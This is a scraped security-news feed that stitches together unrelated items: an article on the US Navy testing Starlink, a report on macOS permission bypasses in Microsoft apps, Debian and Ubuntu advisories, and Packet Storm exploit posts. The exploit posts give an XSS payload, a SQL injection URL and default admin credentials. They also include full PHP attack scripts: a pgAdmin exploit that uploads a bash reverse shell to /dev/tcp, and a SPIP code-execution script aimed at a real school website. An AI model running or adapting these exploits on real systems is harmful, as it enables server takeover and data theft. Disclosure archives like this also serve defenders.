The Navy is testing out the Elon Musk–owned satellite constellation to provide high-speed internet access to sailors at sea. It’s part of a bigger project that’s about more than just getting online.

Life aboard a US Navy warship at sea can be stressful, boring, and lonely, with separation from friends and family and long stretches between port calls both isolating and monotonous. Now, Elon Musk is here to take the edge off.

In a now deleted press release from the Naval Information Warfare Systems Command (NAVWAR), the Navy recently announced that it is experimenting with bringing reliable and persistent high-speed internet to its surface warships. The connectivity comes via a new system developed under its Sailor Edge Afloat and Ashore (SEA2) initiative, which uses satellites from the Starlink network maintained by Musk’s SpaceX and other spaceborne broadband internet providers to maintain a constant and consistent internet connection for sailors—a system that NAVWAR says has “applications across the entire Navy.”

The US Defense Department has for decades relied on a network of aging satellites to furnish service members at sea with decidedly slow internet access, according to an updated release NAVWAR shared with WIRED. By contrast, commercial satellite constellations like Starlink and Eutelsat OneWeb, which number in the thousands and offer coverage from a significantly lower orbit, provide a far superior connection.

The resulting SEA2 system, dubbed the Satellite Terminal (transportable) Non-Geostationary (STtNG), allows a warship’s tactical feeds secure access to low-orbit satellites with a median connection speed of 30 to 50 megabits per second, according to NAVWAR. With the installation of additional Starlink antennas, the system can scale up to speeds of 1 gigabit per second.

NAVWAR said that it scrubbed its initial press release, which showed the installation of a Starlink terminal aboard the aircraft carrier USS _Abraham Lincoln_, from the Pentagon’s Defense Visual Information Distribution System (DVIDS) media portal to “address inaccuracies and ensure the information is correct,” Elisha Gamboa, a command spokesperson, told WIRED in a statement.

News of the Starlink terminal’s installation aboard the _Lincoln_ in particular came as the aircraft carrier and its associated battle group were redirected to the US Central Command area of operations in the Middle East amid increased tensions between Israel and Iran following the former’s targeted killing of a Hamas leader in Tehran.

The Navy has not yet disclosed how many surface warships have received Starlink terminals. Defense officials told DefenseScoop in April that the DOD was at the time evaluating the system aboard two deployed vessels “with aims to field those broadband-providing capabilities across a fleet of up to 200 in the future.”

Originally a “passion project” of _Lincoln_ combat systems officer Commander Kevin White, SEA2 systems were first installed aboard the next-generation aircraft carrier USS _Gerald R. Ford_ in February 2023, offering sailors the ability to quickly and easily communicate with loved ones back home no matter where they are in the world—a major boost to morale amid the doldrums of life at sea. The system even allowed hundreds of sailors to enjoy a live broadcast of Super Bowl LVIII through a normal TV streaming service aboard the warship this past year.

“Having the ability to reach out to friends or family allows our sailors the opportunity to decompress for a few minutes, and that in turn allows them to be able to operate more efficiently,” Richard Haninger, the _Ford_’s deployed resiliency educator, said following the installation of the SEA2 system aboard the carrier in February 2023. “It’s not just about reaching back to friends and family, the ability to pay a bill online, take an online class, or even just check the score of the game \[...\] all of this allows our Sailors the chance to access something that lowers their stress level, then return to work after a quick break more focused and able to complete the mission.”

But beyond morale-boosting applications, SEA2 also purportedly offers major benefits for “tactical and business applications” used by sailors on a daily basis, like, say, those used for air wing maintenance or for tracking pay and benefits. As White explained in a May release from the Navy on the initiative, most of these applications function at higher classification levels and are encrypted, but they’re still designed to operate on the commercial internet without jeopardizing information security.

“The fact that we’re not making use of that opportunity with modern technology to allow classified tactical applications to ride the commercial internet is where we are missing out, so we built \[SEA2\] to be able to do that in the future,” as White put it. “We’re close to demonstrating a couple of those applications, and I am fully confident it will be game changing.” (As of June, the Navy had not authorized the use of classified data with the system)

The Navy also expects to see broad “tangible warfighting impact” from the proliferation of SEA2 across the surface fleet, namely on “recruitment and retention, mental health, cloud services, and work stoppages due to slow and inaccessible websites,” as one service official told DefenseScoop in April.

The Navy isn’t the only service embracing Starlink to enable faster, persistent internet for deployed service members. The US Space Force signed a $70 million contract with Starlink parent company SpaceX in October 2023 to provide “a best effort and global subscription for various land, maritime, stationary and mobility platforms and users” using Starshield, the company’s name for its military products. The US Army currently remains reliant on Starlink, but the service has been casting about for fresh commercial satellite constellations to tap into for advanced command and control functions, according to Defense News. And SpaceX is actively building a network of “hundreds” of specialized Starshield spy satellites for the National Reconnaissance Office, Reuters reported earlier this year.

But Starlink is far from a perfect system, especially for potential military applications. According to a technical report obtained by The Debrief, Ukraine has claimed that Russia’s military intelligence agency has conducted “large-scale cyberattacks” to access data from the Starlink satellite constellations that have proven essential to the former’s military communications infrastructure since the start of the Russian invasion in 2022. Indeed, significant hardware vulnerabilities have imperiled Starlink terminals at the hands of experienced hackers, as WIRED has previously documented.

More importantly, there’s the matter of Musk’s ownership of Starlink. The controversial SpaceX founder had previously refused to allow Ukraine to use the satellite constellation to launch a surprise attack against Russian forces in Kremlin-controlled Crimea in September 2022, prompting concerns among Pentagon decisionmakers that a private citizen with a questionable perception of geopolitics could drastically shape US military operations during a future conflict simply by switching off service branches’ Starlink access, according to an Associated Press report last year.

“Living in the world we live in, in which Elon runs this company and it is a private business under his control, we are living off his good graces,” a Pentagon official told The New Yorker in August 2023. “That sucks.”

In a post on X responding to this article following publication, Musk asserted that “Starlink was barred from turning on satellite beams in Crimea at the time, because doing so would violate US sanctions against Russia!”

“We received an unexpected request in the middle of the night to activate Starlink in Crimea in a matter of a few hours from the Ukraine government, but received no request or permission to override sanctions from the US government,” Musk added. “Had we done as Ukraine asked, it would have been a felony violation of US law.”

Musk previously said that enabling Ukraine to use Starlink to launch its attack would make SpaceX “explicitly complicit in a major act of war and conflict escalation.”

Given these potential risks, it’s unlikely that Starlink will see deeper integration into the major tactical systems that govern the operation of a Navy warship at sea. But for the moment, it looks as though sailors will at least get a welcome reprieve from the stress and solitude of life on the high seas.

_Update 1:50 pm ET, September 3, 2024: Added comments from Elon Musk in response to this article's characterization of Starlink's refusal to enable its service for the Ukrainian military._

The US Navy Is Going All In on Starlink

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework.
"If successful, the adversary could gain any privileges already granted to the affected

Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework.

"If successful, the adversary could gain any privileges already granted to the affected Microsoft applications," Cisco Talos said. "For example, the attacker could send emails from the user account without the user noticing, record audio clips, take pictures, or record videos without any user interaction."

The shortcomings span various applications such as Outlook, Teams, Word, Excel PowerPoint, and OneNote.

The cybersecurity company said malicious libraries could be injected into these applications and gain their entitlements and user-granted permissions, which could then be weaponized for extracting sensitive information depending on the access granted to each of those apps.

TCC is a framework developed by Apple to manage access to sensitive user data on macOS, giving users added transparency into how their data is accessed and used by different applications installed on the machine.

This is maintained in the form of an encrypted database that records the permissions granted by the user to each application so as to ensure that the preferences are consistently enforced across the system.

"TCC works in conjunction with the application sandboxing feature in macOS and iOS," Huntress notes in its explainer for TCC. "Sandboxing restricts an app's access to the system and other applications, adding an extra layer of security. TCC ensures that apps can only access data for which they have received explicit user consent."

Sandboxing is also a countermeasure that guards against code injection, which enables attackers with access to a machine to insert malicious code into legitimate processes and access protected data.

"Library injection, also known as Dylib Hijacking in the context of macOS, is a technique whereby code is inserted into the running process of an application," Talos researcher Francesco Benvenuto said. "macOS counters this threat with features such as hardened runtime, which reduce the likelihood of an attacker executing arbitrary code through the process of another app."

"However, should an attacker manage to inject a library into the process space of a running application, that library could use all the permissions already granted to the process, effectively operating on behalf of the application itself."

It however bears noting that attacks of this kind require the threat actor to already have a certain level of access to the compromised host so that it could be abused to open a more privileged app and inject a malicious library, essentially granting them the permissions associated with the exploited app.

In other words, should a trusted application be infiltrated by an attacker, it could be leveraged to abuse its permissions and gain unwarranted access to sensitive information without users' consent or knowledge.

This sort of breach could occur when an application loads libraries from locations the attacker could potentially manipulate and it has disabled library validation through a risky entitlement (i.e., set to true), which otherwise limits the loading of libraries to those signed by the application's developer or Apple.

"macOS trusts applications to self-police their permissions," Benvenuto noted. "A failure in this responsibility leads to a breach of the entire permission model, with applications inadvertently acting as proxies for unauthorized actions, circumventing TCC and compromising the system's security model."

Microsoft, for its part, considers the identified issues as "low risk" and that the apps are required to load unsigned libraries to support plugins. However, the company has stepped in to remediate the problem in its OneNote and Teams apps.

"The vulnerable apps leave the door open for adversaries to exploit all of the apps' entitlements and, without any user prompts, reuse all the permissions already granted to the app, effectively serving as a permission broker for the attacker," Benvenuto said.

"It's also important to mention that it's unclear how to securely handle such plug-ins within macOS' current framework. Notarization of third-party plug-ins is an option, albeit a complex one, and it would require Microsoft or Apple to sign third-party modules after verifying their security."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Flaws in Microsoft macOS Apps Could Allow Hackers to Gain Unrestricted Access

A vulnerability was found in nescalante urlregex up to 0.5.0 and classified as problematic. This issue affects some unknown processing of the file index.js of the component Backtracking. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.5.1 is able to address this issue. The identifier of the patch is e5a085afe6abfaea1d1a78f54c45af9ef43ca1f9. It is recommended to upgrade the affected component.

**ReDoS in urlregex**

Moderate severity GitHub Reviewed Published Sep 2, 2024 to the GitHub Advisory Database • Updated Sep 3, 2024

GHSA-rw72-v6c7-hf9r: ReDoS in urlregex

Debian Linux Security Advisory 5762-1 - The WebKitGTK web engine suffers from multiple vulnerabilities. An anonymous researcher discovered that processing maliciously crafted web content may lead to an unexpected process crash. Huang Xilin discovered that processing maliciously crafted web content may lead to an unexpected process crash. Huang Xilin discovered that processing maliciously crafted web content may lead to an unexpected process crash. More issues are listed in this advisory.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5762-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
August 30, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-4558 CVE-2024-40776 CVE-2024-40779 CVE-2024-40780  
                 CVE-2024-40782 CVE-2024-40785 CVE-2024-40789 CVE-2024-40794

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-4558

    An anonymous researcher discovered that processing maliciously  
    crafted web content may lead to an unexpected process crash.

CVE-2024-40776

    Huang Xilin discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40779

    Huang Xilin discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40780

    Huang Xilin dicovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40782

    Maksymilian Motyl discovered that processing maliciously crafted  
    web content may lead to an unexpected process crash.

CVE-2024-40785

    Johan Carlsson discovered that processing maliciously crafted web  
    content may lead to a cross site scripting attack.

CVE-2024-40789

    Seunghyun Lee discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40794

    Matthew Butler discovered that private Browsing tabs may be  
    accessed without authentication.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.3-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmbR5W8ACgkQAAyEYu0C  
2ALznQ//bOsY+Xe6T18/q0zsHnyvCV/jxwfjrCUF+OVlulP5LJlrD6uQBdqMr5Jk  
9cRcS+qxc/lnqOGU12+MSc2tfvn9XSl5dqZFTHxCH4ztWDjNBzxKrHk82RIkAQ9p  
UVzrslRIVrZKlqbeBOCIlJSzc6GEJi5Msxy/4lnSbQ380WGfWQ26mplmgnLQgOL1  
OIInHO8VAonPU2I4v4G+BZA1lEKOsoJqXxdg8hsgyBiP4CDcxrpeN6SrPMARUObX  
CAsj+jsm4v8Bj7Wd8KvV4W3H137YmyrjPghWQwgmvyf+rvR1JjDwcXBTuAPv4HTC  
FQAFbVLoeQSLSpMO3b2oQ0s9f8o93/gbc4n7WyTYac/6IzxT/oH9uKwQABzWBg6C  
qcUBgJ1Z7rx9/PgQjWeT7uZdJkT7o7Eux2wtzud82jTM5goOCCqpZo93D35txiIu  
sRMoCaszdH65TJxLjPrJFargLw7x2kN0RJUAK167tnEsX56TWIGF+K7BQAr1YpS1  
mf3+2VC632yp5MXoejBsGDE4bH1OlgKF8xEs13V2LTb3w1ursC046LcOHLURIwX1  
+Cw49Pe6A0nhyv5raUaBzGvV9DbptTM+in8nCI4YXKlcQA87MjOORdVUnW1HWzZe  
PiRFGBay5dgSJW9ebTwVJQxNd2QKWZrLRDOLDhJuucxIZf+Fsb8=  
=SAKx  
-----END PGP SIGNATURE-----

Debian Security Advisory 5762-1

Ubuntu Security Notice 6982-1 - It was discovered that Dovecot did not not properly have restrictions on the size of address headers. A remote attacker could possibly use this issue to cause denial of service.

    ==========================================================================Ubuntu Security Notice USN-6982-1September 02, 2024dovecot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in Dovecot.Software Description:- dovecot: IMAP and POP3 email serverDetails:It was discovered that Dovecot did not not properly have restrictions onithe size of address headers. A remote attacker could possibly use thisissue to cause denial of service. (CVE-2024-23184, CVE-2024-23185)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  dovecot-core                    1:2.3.21+dfsg1-2ubuntu6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6982-1  CVE-2024-23184, CVE-2024-23185Package Information:  https://launchpad.net/ubuntu/+source/dovecot/1:2.3.21+dfsg1-2ubuntu6

Ubuntu Security Notice USN-6982-1

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

Online Job Portal IN version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Online Job Portal IN v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Job_Portal_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /refresh_job_search.php?experience=&qualification=fasd[+] http://127.0.0.1/Job-Portal-master/refresh_job_search.php?experience=&qualification=fasd <=== inject here[+] Login : /admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Job Portal IN 1.0 SQL Injection

pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.

    =============================================================================================================================================| # Title     : pgAdmin 8.4 PHP Code Execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.pgadmin.org/download/                                                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.     This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity   of the database management system and the security of the underlying data.  [+] Description:    The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on.    exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.[+] How to use it:    Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine.    Verify that your machine is listening on the specified port using nc or a similar tool:    nc -lvnp YOUR_PORT[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.[+] Line : 156+157        $ip = 'YOUR_IP'; // Replace with your machine's IP        $port = 'YOUR_PORT'; // Replace with the port you want to use[+] Line : 164+165+166           $targetUrl = 'http://target-url.com'; // Replace this with the actual address           $username = 'admin'; // Username (if required)           $password = 'password'; // Password (if required)              [+] Save As poc.php[+] usage : cmd=> php poc.php[+] payload :<?phpclass PGAdminExploit {    private $targetUrl;    private $csrfToken;    private $username;    private $password;    public function __construct($targetUrl, $username = '', $password = '') {        $this->targetUrl = rtrim($targetUrl, '/');        $this->username = $username;        $this->password = $password;    }    public function exploit() {        if ($this->authRequired() && (!$this->username || !$this->password)) {            die("The application requires authentication, please provide valid credentials.\n");        }        if ($this->authRequired()) {            $this->authenticate();            echo "Successfully authenticated to pgAdmin\n";        }        if (!$this->onWindows()) {            die("This exploit is specific to Windows targets!\n");        }        $fileName = 'reverse_shell.php';        $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());    }    private function authRequired() {        $res = $this->sendRequest('GET', $this->targetUrl . '/');        return strpos($res, 'Location: login') !== false;    }    private function onWindows() {        $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js');        if ($res) {            $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';");            return $platform == 'win32';        }        return false;    }    private function authenticate() {        $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login');        $this->setCsrfTokenFromLoginPage($loginPage);        $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [            'csrf_token' => $this->csrfToken,            'email' => $this->username,            'password' => $this->password,            'language' => 'en',            'internal_button' => 'Login'        ]);        if (strpos($res, 'Location: login') !== false) {            die("Failed to authenticate to pgAdmin\n");        }    }    private function setCsrfTokenFromLoginPage($response) {        if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } elseif (preg_match('/<input.*?id="csrf_token".*?value="(.*?)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } else {            die("Failed to obtain the CSRF token\n");        }    }    private function fileManagerUploadAndTrigger($filePath, $fileContents) {        list($transId, $homeFolder) = $this->fileManagerInit();        $formData = [            'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath),            'mode' => 'add',            'currentpath' => $homeFolder,            'storage_folder' => 'my_storage'        ];        $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true);        if (strpos($res, '"success":1') === false) {            die("Failed to upload file contents\n");        }        $uploadPath = $this->getStringBetween($res, '"Name":"', '"');        echo "Payload uploaded to: {$uploadPath}\n";        $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([            'utility_path' => substr($uploadPath, 0, -15)        ]), true);    }    private function fileManagerInit() {        $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([            'dialog_type' => 'storage_dialog',            'supported_types' => ['sql', 'csv', 'json', '*'],            'dialog_title' => 'Storage Manager'        ]));        $transId = $this->getStringBetween($res, '"transId":"', '"');        $homeFolder = $this->getStringBetween($res, '"homedir":"', '"');        if (!$transId || !$homeFolder) {            die("Failed to initialize a file manager transaction Id or home folder\n");        }        return [$transId, $homeFolder];    }    private function sendRequest($method, $url, $data = [], $multipart = false) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            if ($multipart) {                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            } else {                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));            }        }        if ($this->csrfToken) {            curl_setopt($ch, CURLOPT_HTTPHEADER, [                "X-pgA-CSRFToken: {$this->csrfToken}"            ]);        }        $response = curl_exec($ch);        if (curl_errno($ch)) {            die("cURL Error: " . curl_error($ch) . "\n");        }        curl_close($ch);        return $response;    }    private function getStringBetween($string, $start, $end) {        $string = ' ' . $string;        $ini = strpos($string, $start);        if ($ini == 0) return '';        $ini += strlen($start);        $len = strpos($string, $end, $ini) - $ini;        return substr($string, $ini, $len);    }    private function generateReverseShell() {        // حمولة الاتصال العكسي باستخدام Netcat        $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك        $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه        $shell = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/$ip/$port 0>&1'\"); ?>";        return $shell;    }}// مثال على الاستخدام$targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي$username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا)$password = 'password'; // كلمة المرور (إذا كانت مطلوبة)$exploit = new PGAdminExploit($targetUrl, $username, $password);$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

pgAdmin 8.4 Code Execution 

SPIP version 4.2.7 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.7 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.7 Code Execution

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Tag

#vulnerability